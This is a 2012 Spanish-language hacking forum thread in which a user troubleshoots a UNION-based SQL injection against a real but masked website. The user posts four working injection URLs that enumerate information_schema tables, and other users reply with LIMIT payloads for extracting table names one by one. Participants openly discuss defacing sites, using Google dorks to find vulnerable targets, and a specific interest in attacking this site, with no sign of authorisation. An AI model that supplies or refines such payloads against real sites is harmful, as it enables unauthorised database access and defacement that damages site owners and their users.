elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Duda en Inyeccion SQL al ver tablas
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda en Inyeccion SQL al ver tablas  (Leído 3,923 veces)
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Duda en Inyeccion SQL al ver tablas
« en: 24 Febrero 2012, 17:35 pm »

Hola a todos estoy probando las SQLi  ya que no lo habia echo nunca y tengo una duda he encontrado una pagina vulnerable y ya e sacado el numero de columnas la que es vulnerable pero al pedir la lista de tablas no consigo que me la de entera, siempre me corta la lista, he probado concat(table_name), group_concat(table_name) he probado con limites peor nose... alguna idea?

Esta es la url que e probado:

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

Un saludo
« Última modificación: 24 Febrero 2012, 18:34 pm por Søra » En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #1 en: 24 Febrero 2012, 20:51 pm »

A veces el número de caracteres devueltos son limitados, es decir, por alguna razón devuelve o 1 fila, o 2 filas, etc...
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #2 en: 24 Febrero 2012, 21:26 pm »

Y no puedo hacer nada :S porque jode bastante encontrar la vulnerabilidad y que justo no se vean las tablas buenas :S
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #3 en: 24 Febrero 2012, 22:04 pm »

Para practicarte existen dorks para buscar con google estas vulnerabilidades y alguna encontraras que funcione bien, o tambien existen talleres para practicar, que vendria a ser una web con todas las vulnerabilidades para practicar defaceandola xD

Te digo eso porque yo para lograr mi primer defacing intente con muchas hasta que con una si pude ;)
En línea

Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #4 en: 24 Febrero 2012, 22:12 pm »

Jajaja lo cierto esque ya e echo algun deface pero tenia interes especial en esta web que estoy trabajando ahora....
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #5 en: 25 Febrero 2012, 02:13 am »

Como aclaras en tu primer post de que no habias echo ninguno antes pensaba que querias practicar..
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #6 en: 25 Febrero 2012, 06:41 am »

Pero no entiendo, si muestra algunas tablas, podrías usar un limit para sacarlas una por una... (Un poco tedioso, pero es posible automatizarlo)
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #7 en: 25 Febrero 2012, 10:44 am »

entonces sera que no se usar los limits :S alguien me puede echar una mano porque en internet no encuentro nada especifico sobre limits...

Ya esta solucionado me fallaba la sintaxis muchas gracias shell y edu las probare una a una :)
« Última modificación: 25 Febrero 2012, 10:47 am por Søra » En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Duda en Inyeccion SQL al ver tablas
« Respuesta #8 en: 27 Febrero 2012, 18:31 pm »

+limit+0,1--

de hay vas aumentando

+limit+0,1--
+limit+0,2--
+limit+0,3--
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Tablas relacionadas en sql , duda
.NET (C#, VB.NET, ASP)
nico56 5 8,825 Último mensaje 25 Diciembre 2009, 19:21 pm
por Shell Root
Duda sobre conectar dos tablas en MySQL
Desarrollo Web
xpartano.x 8 4,471 Último mensaje 10 Octubre 2011, 14:23 pm
por fran800m
Duda en juntar dos tablas
Bases de Datos
Brida 1 2,367 Último mensaje 3 Marzo 2013, 13:55 pm
por moikano→@
duda:tablas en Qt
Programación C/C++
novato70 5 2,089 Último mensaje 29 Septiembre 2015, 17:10 pm
por 0xFer
duda relacion tablas
Bases de Datos
ernesto70412 4 3,749 Último mensaje 29 Octubre 2022, 20:59 pm
por ernesto70412
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines